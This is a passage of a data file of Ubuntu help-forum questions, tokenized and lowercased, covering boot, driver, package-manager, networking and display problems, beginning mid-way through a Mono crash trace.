) < 0x0059b > at keepass.forms.mainform.setvisiblecore ( bool ) < 0x000ab > at system.windows.forms.control.set_visible ( bool ) < 0x00029 > at ( wrapper remoting-invoke-with-check ) system.windows.forms.control.set_visible ( bool ) < 0xffffffff > at system.windows.forms.application.runloop ( bool , system.windows.forms.applicationcontext ) < 0x0020b > at system.windows.forms.application.run ( system.windows.forms.applicationcontext ) < 0x0004f > at system.windows.forms.application.run ( system.windows.forms.form ) < 0x00037 > at keepass.program.main ( string [ ] ) < 0x00977 > at ( wrapper runtime-invoke ) .runtime_invoke_void_object ( object , intptr , intptr , intptr ) < 0xffffffff > native stacktrace : /usr/bin/cli ( ) [ 0x80eb88c ] [ 0xb779740c ] [ 0xb7797424 ] /lib/i386-linux-gnu/libc.so.6 ( gsignal+0x4f ) [ 0xb758baff ] /lib/i386-linux-gnu/libc.so.6 ( abort+0x143 ) [ 0xb758f083 ] /lib/i386-linux-gnu/libc.so.6 ( +0x27857 ) [ 0xb7584857 ] /lib/i386-linux-gnu/libc.so.6 ( +0x27907 ) [ 0xb7584907 ] /usr/lib/i386-linux-gnu/libx11.so.6 ( _xread+0x10a ) [ 0xb5c9dc9a ] /usr/lib/i386-linux-gnu/libx11.so.6 ( xlistfontswithinfo+0x38c ) [ 0xb5c7ff9c ] /usr/lib/i386-linux-gnu/libx11.so.6 ( +0x70771 ) [ 0xb5cd7771 ] /usr/lib/i386-linux-gnu/libx11.so.6 ( xcreateoc+0x5d ) [ 0xb5c8c41d ] /usr/lib/i386-linux-gnu/libx11.so.6 ( xcreatefontset+0x7a ) [ 0xb5c80aea ] [ 0xb31d27c0 ] [ 0xb31d2620 ] [ 0xb31d1880 ] [ 0xb31d1610 ] [ 0xb31d1590 ] [ 0xb31d14cc ] [ 0xb31d1423 ] [ 0xb31090ac ] [ 0xb392c05c ] [ 0xb392ba9c ] [ 0xb399a542 ] [ 0xb399a4e4 ] [ 0xb392abdc ] [ 0xb392a980 ] [ 0xb392a620 ] [ 0xb688af70 ] [ 0xb688b2df ] /usr/bin/cli ( ) [ 0x80664a0 ] debug info from gdb : could not attach to process . if your uid matches the uid of the target process , check the setting of /proc/sys/kernel/yama/ptrace_scope , or try again as the root user . for more details , see /etc/sysctl.d/10-ptrace.conf ptrace : operation not permitted . no threads . ================================================================= got a sigabrt while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . if anybody could advise me where i went wrong , i 'll be grateful !
420530	error while installing 13.10	i got this screen while booting to install/try ubuntu 13.10 on an acer m3200 : and there it gets stuck , what should i do or check ?
420534	windows e ubuntu sharing folders	first i do n't speak english very well . and i could not resolve this problem on the forums of my country . in my house i have 1 computer with ubuntu e 2 with windows . when i try share folders of the ubuntu 's partition , the sharing works very well . but , when i try to share folders of my ntfs partition and try access it by windows , i receive a mensage that windows have no permissions to access the folder ( s ) . thanks . ( please answer this mensage without abreviations ) .
420536	looking for a entry level program similiar to microsoft publisher ?	sorry , i am brand new to ubuntu . i am trying to locate a entry level desktop publisher program similar to microsoft publisher for my children to do flyers , posters , cards , etc . sorry with all these high tech questions to add something silly like this to the forum .
420538	i installed the city scope lens in 12.04 but it't not working	i installed the ppa package and then the update . i used the terminal to issue the install command . it looks like it did install but i ca n't find the lens in dash
420539	help with my poblems creating usb from windows .	i have a computer with windows 7 . i want to install ubuntu 13.10 or 12.4 onto my usb stick , so i can boot from it and use ubuntu . i have so far downloaded the desktop version download on the website and the usb creator recommended . i have followed the instructions and when i boot from the usb , i just get a black screen and nothing ever happens . i tried both the 64 and 32 bit version of 13.10 with the same results . can someone please help me understand what i am doing wrong ?
420541	bumblebee - can not access secondary gpu - dell inspiron 7000 15 inch	i cant seem to get bumblebee to work with the dedicated gpu . when i run something for example : primusrun glxgears i end up with : primus : fatal : bumblebee daemon reported : error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:4:0:0 . please not really sure where to start with the issue , i have the dell inspiron 7000 15 inch which has a geforce 750m
420543	system monitor script	i created a simple script written in bash to constantly monitor my system temp and ram free . while : do clear ; echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -ram load -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- $ free -mt ; echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -temperature -- -- -- -- -- -- -- -- -- -- -- -- -- - $ sensors ; sleep 1 ; clear ; done i was wondering if it is possible to write this data to a simple text file , or worksheet thingy , for use with dygraphs
420544	ubuntu on ssd issue	i just got my new laptop up and running with windows 7 . the thing is my main os is ubuntu , and therefore i would like to install it on my ssd . the problem is whenever i boot up the ubuntu installer it only detects my 1tb hard drive , and not my ssd . any suggestions ?
420545	gb-bxi7-4770r can not recognize wireless and hdmi sound through port	i can not access any wireless connections through the wifi , and i can not hear sound through the hdmi port on my new gb-bxi7-4770r . originally , i wanted to install xbmcbuntu on my new gb-bxi7-4770r . after the install , however , everything works except wifi and sound through the hdmi port . i have tried to use multiple distro flavors , such as ubuntu 13.10 , 13.04 and linux mint 15 , but the result is the same for all three . i suspect that the correct drivers are not being recognized . has anyone gotten these two things working ? if so , how ? this new gigabyte brix pro is a fantastic machine , i 'm sure . now if only i could get it working ... kind regards
420546	if i can mount an iso will it also install ?	is it possible to mount an iso with acetoneiso and from there actually install to my hdd ? here is what i have done . installed ubuntu 10.10 so that i have a system . iso does not fit a cd ( which will boot ) and will not boot a dvd . i have tried the iso on usb stick , but the computer says nope . i can install acetoneiso from software center .
420551	ubuntu cant boot up	i was using my ubuntu happily and suddenly it starts behaving weird , icons disappear and becomes half-unresponsive , so i do a hard shutdown . when i start it again , the first weird thing i notice , the grub background has gone black , instead of purple . when i select ubuntu as my os , i get this error : error : attempt to read or write outside of disk `` hd1 '' . error : you need to load the kernel first press any key to continue now i cant go inside ubuntu and im stuck in windows . what can i do ?
420553	login fails after update to 13.10	i was running 12.04 and updated to 12.10 and when i logged in i had my desktop icons and folders but unity interface was gone . i upgraded to 13.10 hoping it would it would resolve the problem . ( during that upgrade it froze on downloading drop box so i locked that process and it crashed the upgrade , so then i ran do-system-upgrade -d and did the upgrade again ) . now it just displays my desktop background and says ubuntu 13.10 in the bottom left corner of the screen after i type in my password into the login screen . i have lxde installed and i can log into that . i think i have a intel gm965 graphics processor ( i get that when i run lshw -c video )
420557	unity does n't load , unless using setsid	so i just tried uninstalling gnome-shell and restoring unity , mostly everything is working except that unity ca n't seem to start itself . i just get a black screen with an `` x '' cursor ( x11 ? ) . i am able to start unity manually by invoking `` setsid unity '' and then everything works fine . any ideas as to how i can fix unity to be able to start up on its own ? ( i already did a unity reset ) . thanks
420558	how do i troubleshoot a libreoffice outline ?	i have a slightly fancy outline in libreoffice writer that i use to manage lesson planning . for every week that the class meets i have a level 1 header , the line is something like jan 31 : welcome and the outline formatting adds week # / to that so that what actually appears is week 1 / jan 31 : welcome -- then i use level 2 headers to break up the class session ( `` welcome and introductions , 30 min '' ) . it works pretty great . i can use the navigator to move around in the document , i can print the pages i need to prep for any given week . fab . but somewhere along the line , i screwed up week 3 . i do n't know how i did it , but i ca n't seem to fix it . what i have is basically this : week 1 / jan 31 : welcome week 2 / feb 07 ... week / feb 14 ... week 4 / feb 21 ... week 5 / feb 28 ... i looked in tools > outline numbering ... and i do n't see anything that would restart the numbering or prevent numbering of item 3 . i have the navigator open so i know i do n't have any stray header 1s . using ctrl0 to make that header plain text does n't seem to change the numbering . neither does changing it back . i tried adding a new week after week 2 , and that adds it as *week 3 / * but when i replace my busted week with it , i just get : week 1 / jan 31 : welcome week 2 / feb 07 ... week 4 / feb 14 ... week 5 / feb 21 ... week 6 / feb 28 ... it is like the outline is committed to avoiding week 3 . how do i even troubleshoot this ?
420560	the .bashrc file changed back after reload it	i changed the .bashrc file and run source ~/ . bashrc it changes back to the old one . why ?
420562	vlc causes system to freeze in 12.04	all of a sudden , when i launch vlc and try to play a video it freezes my whole system including the mouse . the only options i have is to press the power button or use the reisub series of commands . i noticed that there is sound . i 've been checking around the boards and a lot of the posts with issues similar to mine seem to be several years old . my computer has 10gb of ram . i have lubuntu 13.10 dual installed and when i switch over to lubuntu videos play just fine . i have already tried checking the task manager to find out if there are any processes that are using a lot of memory . firefox was only taking up about 400mb of ram and the computer still freezes . even the task manager froze .
420564	how to bridge between two computers	i have this 3 machines with this setup computer1 -- -- computer with ubuntu 12.04 -- -- -computer2 computer1 have ip 192.168.10.1 and computer2 have 192.168.10.10 . my computer with ubuntu have 2 ethernet interfaces . i want to create a bridge in ubuntu so computer1 and computer2 can talk to each other . i have created a bridge in ubuntu with sudo ifconfig eth0 0.0.0.0 down sudo ifconfig eth1 0.0.0.0 down sudo brctl addbr br0 sudo brctl addif br0 eth0 sudo brctl addif br0 eth1 sudo ifconfig br0 up sudo ifconfig eth0 promisc up sudo ifconfig eth1 promisc up the command `` brctl showstp br0 '' shows me that the state of eth0 and eth1 is forwarding . then i start tshark in bridge with sudo tshark -i br0 if in computer2 i try to ping computer1 i get arp 60 who has 192.168.10.1 ? tell 192.168.10.10 in the bridge i get the arp request from computer2 but i do n't see arp reply from computer1 when i run the tshark at computer1 gets this arp 60 who has 192.168.10.1 ? tell 192.168.10.10 arp 42 192.168.10.1 is at xx : xx : xx : xx : xx : xx ( mac hidden ) with this i see that arp gets passed through the brige , computer1 receives the arp and sends the reply but that reply do n't go through the bridge . any ideas ? ? ? thanks
420569	how to calculate the average of cpu usage and memory usage over a period of time in ubuntu	i have to generate reports for the following : 1- cpu usage . 2- memory usage . the generated reports must be looks like the following forms : i 've tried with more than one command to get system readings ... such as htop , atop and dstat -ta -- top-cpu the result for htop was : the result for atop was : the result for dstat was : which is the correct command should i use to gather the correct system readings in which i can calculate the average value , min value , max value , median value and deviation for the cpu usage , memory usage , open files count and open ports count as in the first and second picture ? if any one can help me to decide the appropriate command ... i hope if he can also tell me what the important numbers from the resulting system readings should i take to calculate the columns in the first two pictures ? the data must be stored in a database that consists of a specific tables while the reports can be generated with the help of a java application which is responsible to deal with the database and use the retrieved data to make calculations and generate reports ... now i 'm trying to make the database model so i need to know the necessary columns in the tables so i need your help to start the actual work for me which is the java application ... just i want to know what data should i take in my consideration !
420571	ubuntu 13.10 ca n't access my primary user	i have both ubuntu 13.10 and windows xp running on my computer ( pentium iv 3.0 ghz 2 gb ram 300 gb hd ) . my hard disk has some weird problem where every since it 'breaks ' up and i have to disconnect my computer and move the hd cable inside the case so it can work again . yesterday it happened and it seemed to damage the integrity of the hard disk so windows asked for a chkdsk wich did n't repair anything . i ran chkdsk again from startup and did n't happened anything so i gave up . today i tried to access ubuntu and i found that it was restored , like if i was just installed it . i ca n't access either the windows partition or either my real user , i 'm using a weird account named `` guest12-yeod '' and i ca n't use sudo . all my programs are still there but their configuration is completely lost . what do you recommend me to do ? also , if i restart my computer , it restores again , loosing all my configuration . ( sorry if at some spot i have bad english , i 'm from venezuela )
420574	recover grub from grub-rescue	i was using ubuntu normally and suddenly the system went haywire and i had to do a hard reset . after that i got a couple errors trying to load ubuntu , so i switched to windows trying to find an answer . windows froze after about 5 minutes and now everytime i reboot i find a `` grub-rescue '' shell how can i recover my system ? i booted up a ubuntu pendrive and tried to run `` boor-repair '' but that didnt work . this is the log that gave me back http : //paste.ubuntu.com/6927683/
420586	rescheduling backups : is there a way to do it ?	is there a way to reschedule the backup to another day and keep it like that with the pre-installed backup program ? because the day i have it on ( i do weekly backups ) does n't work for me and i have to do them after being reminded a thousand times before doing one . if this matters , i 'm using ubuntu 13.10 32-bit .
420587	tried to install wireless driver and now terminal and update manager no longer work either	my pc specifications : dell latitude d830 . fresh install of ubuntu 12.04 ( 64bit ) dual boot with windows xp pro 6 days ago . chip id is broadcom bcm4311 . pci-id is [ 14e4:4312 ] last week i installed unbutu 12.04 ( 32bit ) on two other old dell laptops , an inspiron 6000 and an inspiron 9000 , with absolutely no problems . one dual boot and the other on its own . i am totally new to this , never installed an os before and having never even seen ubuntu before last week ... so simple answers please : ) this third install went very smoothly , though i had to do it hardwired to the internet , since it could n't find the wireless : wireless works perfectly in windows . when restarting after the os install , the screen got stuck on the ubuntu logo splash page with the 5 dots . i pressed the button and then rebooted . i have tried all that i could find in this forum on fixes for shutdown or resart , none of them have worked . the screen stays stuck on the ubuntu with the 5 dots screen and i then push the button to complete the shut down . the last fix i tried was from this link so i 've left issue for now and trying to get the wireless working , with no success on the contrary . i 've just installed the bcmwl-kernel-source package from these instructions . the wireless connection still did n't work , so i shut down and rebooted . now after rebooting , there is still no wireless connectivity . the wireless switch on the computer is on . there is still no wireless choices in the menu bar . i decided to run the update manager and it does n't work anymore . throws a not all updates can be installed error with a list of reasons . when i press close , i get another error , this time software index is broken , its impossible to install or remove any software - again with suggestions . i then went and found on the forum how to uninstall what i had just installed through the terminal , hoping to get back to where i started from , since both the update manager and the terminal were working before the install . the terminal gives me the following result : sudo apt-get remove bcmwl-kernel-source . message reads on the terminal : e : could not get lock /var/lib/dpkg/lock - open - ( 11 : resources temporarily unavailable ) e : unable to lock the administration directory ( var/lib/dpkg ) , is another process using it ? nothing is running in the background . i 'm rather exasperated since every move i make is bran new , and after spending days reading in the forum and trying what seems to work for others nothing does . before starting to try to fix the wireless today , everything in ubuntu works beautifully , now if i ca n't do updates or use the terminal , that 's not so good .
420590	macbook pro 5,3 - install problems - 12.04.4	i am attempting to install ubuntu 12.04.4 lts on my mbp 5,3 , however i have run into some issues regarding the process . attempting to fix the second is made more difficult by my fix for the first , so i need some help finding a workaround . issue # 1 : no video when booting from liveusb ( or livecd ) . so i added `` nomodeset '' to the boot parameters . now , when selecting `` install ubuntu '' , it boots just fine . however , when selecting `` try ubuntu '' , it just boots to a command line ( which i have gathered is normal for nomodeset ) . ( for reference , i attempted to use the `` outb '' commands , but grub did n't understand them . ) issue # 2 : ubuntu hangs on `` preparing to install ubuntu '' page . documented : ubuntu 12.10 installation hangs at 'preparing to install ubuntu' i can not attempt any of the fixes for this because pressing ctrl-alt-f1 to bring up a terminal makes the installer disappear and brings up just a command line ( as if i booted into `` try ubuntu '' ) . i do not know where to go from here . any suggestions ?
420592	brightness determined by eveness and oddness of level numbers	i have a lenovo g500s laptop on which i installed ubuntu 13.10 , and i am having problems with my brightness , which does not rise and fall gradually but instead alternates between the maximum and minimum brightness . namely , it seems that whenever the brightness level is an odd number , the screen is set at maximum brightness and whenever there is an even number , it is set at minimum brightness ( except for 16 , the highest number , which sets it at maximum brightness ) . it seems to be a problem even with the `` brightness and lock '' slider . all help will be appreciated .
420593	after upgrade from desktop 12.04 to 12.10 can not boot to unity	i have tried to use the update manager to move up to 12.10 . on boot i see an option for `` ubuntu '' . this starts the maroon screen with 5 dots that just hang . or i can choose `` advanced options for ubuntu '' . i see `` ubuntu with linux 3.8.0-35-generic '' with/without recovery mode . if i choose normal , i get `` loading initial ramdisk '' , then the maroon screen that hangs . if i choose revovery mode , i end up at a command prompt and i can login ok . if i choose recovery , i get the recovery menu . `` resume normal boot '' does n't work . or if i choose dpkg , all is well . if i choose failsafex ( run in failsafe graphic mode ) i see : xinit unable to run server /usr/bin/x startx yields : xauth : file /root/.xauthority does not exist /etc/x11/xinit/xserverrc : 3 : exec : /usr/bin/x not found my graphics card is nvidia geforce gt 430 how do i fix this ?
420598	how do i change the icon size in the kde status bar ?	on my 13 inch screen with 3200x1800px i adapted all fonts to 230dpi which is ok in most cases . also in settings , i could change icons of the kde theme to 64px . only the icons in the statusbar at the bottom right corner ( velocity , network , ... ) are still only about 16x16 px , which is barely readable . they seem ĺot to obey the same rule . where can i change them ?
420599	difficulty flashing bios on an hp pavilion slimline desktop	i used these instructions to flash my bios , but freedos says the file ca n't be run in dos mode . here is the page i got the file from . i also thought it was strange that there is an exe file but no archive like most other providers have .
420601	ca n't download ubuntu - computer thinks its an app	it does download , but when i try to open the download , my computer thinks it is an application and wo n't start it . i am not very good with computers , but i know that i want off the microsoft/windows plantation ... please help .
420602	problem with gnome appearance	i am trying to configure my ubuntu ( 13.10 ) to get this appearance : i ran into a few problems . 13.10 uses unity . i followed a tutorial to change it to gnome-classic ( as that is what i thought i was looking for after a some research ) . it probably was n't was i was trying to get . i tried changing and fumbling in all the visual settings i could find to no avail . everything is white in my version . workspaces in bottom right are missing . left bottom icon on taskbar is missing . all icons are different . i am pretty sure i have gone the wrong way but could not find how it was actually supposed to be done . ( i followed this tutorial . ) i would like this layout as it is the one we use at school . what am i doing wrong ? edit : i have figured something out : i needed gnome flashback , which started working after a few fixes , it starts looking good now . my cursor is invisible . the initial login screen is different . ( not a priority as it seems to work properly ) i have a gray one with log-in info in the center . i tried to have one with the login on the left , but it 's hard to look for info with no clue as what they 're called .
420609	apt-get remove vicious cycle	i am try to resolve some libboost problems . eventually i decided it would be easier to remove it cleanly and start from scratch . but when i run sudo apt-get -- purge remove libboost* i get : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libcmis-0.3-3 : depends : libboost-date-time1.53.0 but it is not going to be installed liborcus-0.6-0 : depends : libboost-system1.53.0 but it is not going to be installed libreoffice-core : depends : libboost-date-time1.53.0 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . so i run sudo apt-get -f install and get reading database ... 200480 files and directories currently installed . ) unpacking libboost1.54-dev ( from ... /libboost1.54-dev_1.54.0-2ubuntu3_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libboost1.54-dev_1.54.0-2ubuntu3_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/quickbook ' , which is also in package libboost1.53-tools-dev 1.53.0-6+exp3ubuntu8 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libboost1.54-dev_1.54.0-2ubuntu3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so now im stuck in this loop and ca n't neither uninstall nor install what shoud i do ?
420612	where can i customize window sizes of notifications in kde ?	on my 13 inch 3200x1800px screen if i click on an icon in the bottom right corner the popping up window is far too small : how can i change the window width of those popup notifications ?
420613	virtualbox remote display on ubuntu server no ts printers	i am having a problem using windows remote desktop . i have two offices and want to remoted into the server from the other office and be able use the printer at my local machine and access the drive of my local machine and yes a have check the box in the remote desktop settings to the redirect the resources . the problem arises when the virtualbox guest xp machine is using ( remote display ) mode with a port number . it does n't allow you to see the local resources like printers and drives . but if i use the actual guest xp machines ip of ( virtualbox ) in can access the resources . i would like to have single ip of the host handling 4 xp virtualbox guest and be able to see my local resources . anyone have and answer or this ca n't be done. ? ? ? this is using ubuntu 13.10 and virtualbox 4.2 and window xp pro as guest . thank you.i hope this is clear .
420614	can not get windows 7 to dual boot with ubuntu 12.04 on lenovo y510p with hybrid drive	i have a lenovo y510p laptop that came pre installed with windows 8 . after some shenanigans i ended up having to completely wipe everything off of it . so now i have a blank hard drive and a usb disk with a legal win 7 on it and another one with ubuntu 12.04 . i have tried every topic on these forums and still can not get dual boot to work . i can install win7 and it will work just fine . i than install ubuntu 12.04 and i lose win7 , but ubuntu than works fine . when i install ubuntu i do not get the option to install side by side with win7 and when i run os-prober i get this : /dev/sdb1 : windows 7 ( loader ) : windows : chain after running boot repair and selecting the win7 loader in grub , i get this message : error : invalid efi file path when i try to boot from legacy mode i get a message stating that bootmgr is missing . based on the suggestion in the comments i tried to format my win7 install into an efi format and install everything in efi only mode . the windows installer loads than freezes at the splash screen . also my ubuntu live usb will not boot , grub comes up than no matter what option i select it will go to a black screen and freeze up . it seems that uefi mode is just plain broken on the y510p unless your running win8 . i tried secure boot on and off , also tried the `` other operating system '' and `` windows 8 '' modes all with the same results . in legacy mode my unmodified win7 live usb and my ubuntu 12.04.4 live usb 's will boot up and install . so i went back to legacy mode , successfully installed win7 and than put in the ubuntu live usb . from there i ran fixparts and now gparted can see my windows partition . os-prober has the same output , and the ubuntu installer still can not see any other os 's on my machine . i ran boot repair and was given this url : http : //paste.ubuntu.com/6952157/ my computer only has one hybrid drive , /dev/sda is the ssd and /dev/sdb is the hdd , i do n't know if this has anything to do with my issues .
420616	myunity not working 12.04	i am trying to set up unity on my computer and it has repeatedly given me this error code : [ 6 ] type mismatch : wanted void , got string instead . main . ? .o anybody know what this means ? i was thinking it might be because i am running on a powerpc . am i correct ? and if so , are there any alternatives to unity on a powerpc ? -miles
420617	shell script : cd to dir and execute command	i 'm trying to create a shell script that will automate the creation of a maven project . the last line throws an error [ error ] unknown lifecycle phase `` âdwtpversion=2.0 '' . you must specify a valid lifecycle phase or a goal in the format : or : [ : ] : . available lifecycle phases are : validate , initialize , generate-sources , process-sources , generate-resources , process-resources , compile , process-classes , generate-test-sources , process-test-sources , generate-test-resources , process-test-resources , test-compile , process-test-classes , test , prepare-package , package , pre-integration-test , integration-test , post-integration-test , verify , install , deploy , pre-site , site , post-site , site-deploy , pre-clean , clean , post-clean . - > [ help 1 ] the script i have so far is : # ! /bin/bash clear echo `` create maven/eclipse webapp project '' echo `` close eclipse or this script will not succeed '' echo -n `` enter project name : `` read name echo -n `` enter groupid : `` read groupid mvn archetype : generate -dgroupid= $ groupid -dartifactid= $ name -darchetypeartifac $ cd $ name mvn eclipse : eclipse âdwtpversion=2.0 i read and tried some of the suggestions in this post but to no avail , it 's not going into the newly created project directory . how should i approach this ? also , i forgot to add the most important piece of information : when i go into the project root directory manually and execute mvn eclipse : eclipse -dwtpversion=2.0 it runs successfully .
420618	fn+f8 does not switch screens on asus 1015e	when i press fn+f8 screens ( monitors ) are not switched , but launcher appears on left side of the screen containing numbers inside every icon . sometimes a small text dialogue box appears on bottom right . i have an asus 1015e with ubuntu 12.04 lts fresh install . help please .
420619	how do i keep the icon bar visible-it disappears from my desktop	i ca n't figure out how to keep the icon bar visble . it disappears and only pops up if i put the cursor in the middle of the screen and right click . any help would be appreciated . thank you .
420620	how to install a brother mfc-885cw printer	how do i install a brother mfc-885cw printer ? the driver does not appear on the ubuntu list . i downloaded the drivers for linux to my download file , but can not get this printer installed .
420621	setting passwordless ssh when a home directory is shared with nfs	i have two nodes ( master and slave ) where the home directory of the master is shared via nfs with the slave node . i have created an ssh key and used 'ssh-copy-id ' to add the public key to 'authorized_keys ' . the passwordless ssh works from the slave to the master , but not from the master to slave as i get `` agent admitted failure to signing using key '' . i think it may be an issue with file permissions but it is tricky since ~/.ssh folder is shared using nfs . any ideas ?
420623	terminal wont allow me to do sudo commands	when i attempt to run : sudo apt-get install ( place any program package name here ) i receive the following : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i have nothing running except for firefox and terminal , and it was working previously .
420630	ubuntu on mac diver for nvidia c79 [ geforce 9400m ]	i am running 12.04 on macbook 5,1. lshw -c display gives the following output : *-display unclaimed description : vga compatible controller product : c79 [ geforce 9400m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : b1 width : 64 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : d2000000-d2ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:1000 ( size=128 ) memory : d3000000-d301ffff i need help in figuring the correct driver for this gpu . when i tried activating the driver using jockey , i get this error sorry , installation of this driver failed . i have a 63kb jockey log dump which i can paste if needed .
420632	hplib command prompt unable to change scan area	i connected a hp officejet 4500 g510 all-in-one printer to my ubuntu 13.10 . it called the hplip 3.13.9 from its repository and thereby , i could flawlessly print my documents . also , scanning with xsane was perfect . however , when i tried to use the shell commands to scan a document , which are documented on hplib 's web-page , i encountered problems related with the size of the paper : the default setting for paper height is 381mm and i am unable to change it . i tried to use the following commands , but none of them helped : $ hp-scan < device uri > a4 $ hp-scan < device uri > -units=mm -- area=215.9,279.4 $ hp-scan < device uri > -- brx=215.9 -- bry=279.4 am i doing something wrong , or could it be a bug ? how can we change the default settings for scanning area ? changing the default settings may be a workaround ...
420633	openvpn no longer working out of the blue	my openvpn connection failed on me , after a restart . it no longer connects to the vpn . the connections are still in the network manager . and the vpn files are still in the same folder . i get this error message : can not import vpn connection the file 'vpn.conf ' could not be read or does not contain recognized vpn connection information error : unknown error . when i try to import the vpn configuration . did n't install nor update anything major before rebooting as far as i can remember . purging network-manager-gnome and reinstall did n't fix it . i 'm running ubuntu gnome 13.10 with the 3.13.2 kernel ( due to haswell fixes ) and gnome 3.10.1 which i upgraded to , by doing this : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo add-apt-repository ppa : gnome3-team/gnome3-next sudo add-apt-repository ppa : gnome3-team/gnome3-staging sudo apt-get update sudo apt-get dist-upgrade that is what differs on my setup from the default 13.10 install . as mentioned , i had it working perfectly , so weird that it failed me randomly . any help and guidance is really appreciated here . i 'm lost and frustrated , this is a fresh install that i invested quite some time , due to deja dup errors . thanks edit : i get this error : openvpn -- config ~/downloads/vpn/vpn_linux.conf options error : -- ca fails with 'ca.crt ' : no such file or directory options error : -- cert fails with 'vpn.crt ' : no such file or directory options error : -- key fails with 'vpn.key ' : no such file or directory options error : please correct these errors . that is with a freshly downloaded copy of the vpn configuration . and the files mentioned are definitely in the same folder and do exist . after doing : sudo apt-get install ppa-purge sudo ppa-purge ppa : gnome3-team/gnome3-staging sudo ppa-purge ppa : gnome3-team/gnome3-next i can connect to existing vpns again only . import still fails . also get error : `` unable to load vpn connection editor '' when i view the vpn connection . something is broken : (
420635	ati radeon refresh rate	i 've two lg flatron ips236 displays @ 1920x1080x60hz , and an ati radeon hd 6870 , which is using the 'recommended ' x.org drivers . on windows ( yeah.. ) i used to be able to force the refresh rate to 75hz , but i 've had no luck on ubuntu . this is a deal-breaker for me , except for the fact that i 'm a developer , so i ca n't really rely on windows . but i need my eyes , my eyes are important . âť xrandr screen 0 : minimum 320 x 200 , current 3840 x 1080 , maximum 16384 x 16384 displayport-0 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 510mm x 290mm 1920x1080 60.0*+ 50.0 59.9 1920x1080i 60.1 50.0 60.0 1680x1050 59.9 1280x1024 60.0 1280x960 60.0 1152x864 60.0 1280x720 60.0 50.0 59.9 1024x768 60.0 800x600 60.3 720x576 50.0 720x480 60.0 59.9 640x480 60.0 59.9 hdmi-0 disconnected ( normal left inverted right x axis y axis ) dvi-0 connected 1920x1080+1920+0 ( normal left inverted right x axis y axis ) 510mm x 290mm 1920x1080 60.0*+ 1680x1050 59.9 1280x1024 60.0 1280x960 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 dvi-1 disconnected ( normal left inverted right x axis y axis ) 1920x180_85.00 ( 0x314 ) 39.0mhz h : width 1920 start 1976 end 2160 total 2400 skew 0 clock 16.2khz v : height 180 start 183 end 193 total 196 clock 82.9hz i 've tried using compizconfig settings manager but changing the refresh rate in there does n't seem to apply any changes at all . how do i force the refresh rate past 60hz , to at least 75hz ?
420636	desktop 12.04 will not take assigned ip address from my dhcp server	i have my dhcp server configured at 192.168.6.13 my dhcpd.conf is configured to have static ip addresses however my desktop will not take the ip address assigned it grabs from my dynamic range . snip of dhcpd.conf and my desktop configuration dhcp.d conf key `` rndc-key '' { algorithm hmac-md5 ; secret `` its a secret '' ; } ; include `` /etc/bind/rndc.key '' ; ddns-update-style interim ; ddns-domainname `` example.com '' ddns-rev-domainname `` in-addr.arpa . `` ; option domain-name `` example.com '' ; option domain-name-servers ns.example.com ; option routers 192.168.6.1 ; option broadcast-addres 192.168.6.255 : default-lease-time 600 ; max-lease-time 7200 ; authoritative ; log-facility local7 ; subnet 192.168.6.0 netmask 255.255.255.0 { range 192.168.6.21 192.168.6.200 ; zone example.com . { primary 192.168.6.13 ; key `` rndc-key '' ; } zone 6.168.192.in-addr.arpa . { primary 192.168.6.13 ; key `` rndc-key '' ; } } host virtualguest3 { hardware ethernet 00:00:00:00:00:00 ; fixed-address 192.168.6.11 } my settings for wired 1 eth0 automatic ( dhcp ) but it grabs ip address 192.168.6.23 broadcast address : 192.168.6.255 subnet mask : 255.255.255.0 default route 192.168.6.1 primary dns 192.168.6.13 here is my /etc/network/interfaces auto eth0 auto lo iface lo inet loopback any idea 's i should not have to set it statically my other machines work fine they are servers so they are set as static ip 's .
420637	how to remap key only when alt is down ?	i want j to send arrowleft while alt is down . also , shift + j should send shift + arrowleft while alt is down . i have been able to get this working using xbindkeys but it does n't work in the terminal and it causes the window to lose and regain focus . is there a way to do this using the standard setxkbmap ? i feel like that would work better .
420640	trouble with ati graphics driver	i have the ati 6370m graphics card in my laptop , but when i go to install the driver i get problems . it slows everything down and apps begin to crash , i really would like to have my hd graphics work like they do in windows . anyone else have this issue ? any solutions ?
420641	how do i choose ubuntu install size on mac ?	when i chose to install ubuntu alongside my mac os i saw no option to choose how big i wanted my install to be . it installed it and booted from the installed ubuntu , and it looks fine , but how can i resize the partition so i have free space again ?
420646	mouse clicks suddenly stops working	lately , i 've been experiencing issues with my usb wireless mouse . while working on something , or even sometimes while the system is idle , the mouse buttons will stop working . i can move the mouse around all i want , and the cursor will move on-screen , but i can not click on anything . when this occurs , sometimes i can scroll , other times not . throughout , the keyboard still continues to function . the only way to get the mouse to start working properly again is to either restart the computer or restart the x server by pressing ctrl+alt+backspace . there is nothing wrong with the mouse , it works fine while plugged into other machines . i have all the latest updates according to the software updater . any ideas ? edit : also thought i 'd note that when another mouse is plugged in while the mouse is not functioning , it is unable to click as well . the strange thing is , though , firefox still works with the mouse as it should , while other applications do not . system specs : compaq presario sr2170nx dual intel pentium 4 processor 2 gb ram , 2.4 gb swap ihome usb wireless mouse ubuntu 12.10 ( this is a clean install , about 2-3 weeks old . )
